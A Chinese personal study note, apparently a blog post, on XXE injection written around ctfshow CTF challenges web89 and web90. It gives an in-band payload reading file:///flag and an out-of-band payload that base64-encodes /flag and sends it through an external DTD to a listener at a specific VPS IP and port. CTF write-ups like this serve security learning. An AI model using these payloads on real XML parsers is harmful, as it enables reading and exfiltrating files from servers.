【心得】XXE漏洞利用个人笔记

XML中关于DTD类型(内部(SYSTEM)的和外部(PUBLIC)的区别)

xxe的利用

XML Entity 实体注入

当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞

危害

主流是任意文件读取

XML 文件

一般表示带有结构的数据

祖父 3个叔父 8个堂弟堂妹

<祖父>

<叔父1>

<堂兄1>

</叔父1>

<叔父2>

<堂兄2>

</叔父2>

<叔父3>

<堂兄3>

</叔父4>

</祖父>

xml格式

1 有回显时文件读取方法

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE hacker[

<!ENTITY hacker SYSTEM "file:///flag">

]>

<root>

<ctfshow>

&hacker;

</ctfshow>

</root>

例题1 web89

post传:

<?xml version="1.0" encoding="UTF-8"?>


<root>
    <ctfshow>
        hacker
    </ctfshow>
</root>

看到回显hacker

可以实现任意文件回显

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY hacker SYSTEM "file:///flag">
]> 

<root>
    <ctfshow>
        &hacker;
    </ctfshow>
</root>

这里文件名纯靠猜,文件读取是建立在文件名已知的基础上的

2 无回显时文件读取方法

例题2 web90

无回显点,考虑数据外带

post传

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE hacker[

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">

<!ENTITY % myurl SYSTEM "http://124.222.136.33/test.dtd">

%myurl;

]>

<root>

1

</root>

在vps上创建文件test.dtd

test.dtd内容

<!ENTITY % dtd "<!ENTITY &#x25; vps SYSTEM 'http://124.222.136.33:1337/%file;'> ">

%dtd;

%vps;

vps监听1337端口即可

相关推荐
为几何欢14 分钟前
【内网安全】组策略同步-不出网隧道上线-TCP转ICMP
网络·tcp/ip·安全·网络安全
结衣结衣.22 分钟前
完全理解C语言函数
java·linux·c语言·数据库·经验分享·笔记
东方佑44 分钟前
使用tkinter 制作工作流ui
前端·windows·笔记·python·ui·分类
风控牛1 小时前
【 VIPKID-注册安全分析报告】
安全
炫酷的伊莉娜1 小时前
【网络安全】第4讲 身份认证技术(笔记)
笔记·安全·web安全
安全方案1 小时前
网络安全的十字路口:向“架构化”转移
安全
寅双木1 小时前
时钟系统框图(时钟树)解析
笔记·软件工程·软件构建
Java追光着1 小时前
谷粒商城笔记-03-分布式基础概念
笔记·分布式·谷粒商城
小龙在慢慢变强..1 小时前
C语言学习笔记--第一个程序
c语言·笔记·学习
做跨境的红姐1 小时前
为什么网络爬虫广泛使用HTTP代理?
tcp/ip·安全·ip